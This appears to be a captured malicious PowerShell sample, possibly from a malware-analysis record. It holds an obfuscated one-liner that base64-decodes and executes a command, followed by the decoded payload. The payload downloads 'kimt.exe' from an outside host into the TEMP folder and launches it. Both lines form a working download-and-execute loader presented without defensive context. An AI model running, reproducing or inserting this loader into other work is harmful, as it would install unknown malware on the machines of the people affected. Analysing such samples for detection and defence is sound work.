iex([SYStEM.tEXt.enCODing]::Utf8.gEtsTrInG([SySTeM.ConVERT]::FrOMbASe64STriNg('CihOZXctT2JqZWN0IFN5U3RFbS5ORXQud0VCY0xpRW5UKS5ET3dObE9hRGZpbEUoJ2h0dHA6Ly9nZXRsb2hudW1jZWRlcnMuaG9ub3IuZXMva2ltdC5leGUnLCIkRU5WOlRFTVBca2ltdC5leGUiKTtTdGFydC1Qcm9jZXNzICgiJEVOVjpURU1QXGtpbXQuZXhlIikKCg==')));exit

##### B64 CONTENT #####


(New-Object SyStEm.NEt.wEBcLiEnT).DOwNlOaDfilE('http://getlohnumceders.honor.es/kimt.exe',"$ENV:TEMP\kimt.exe");Start-Process ("$ENV:TEMP\kimt.exe")

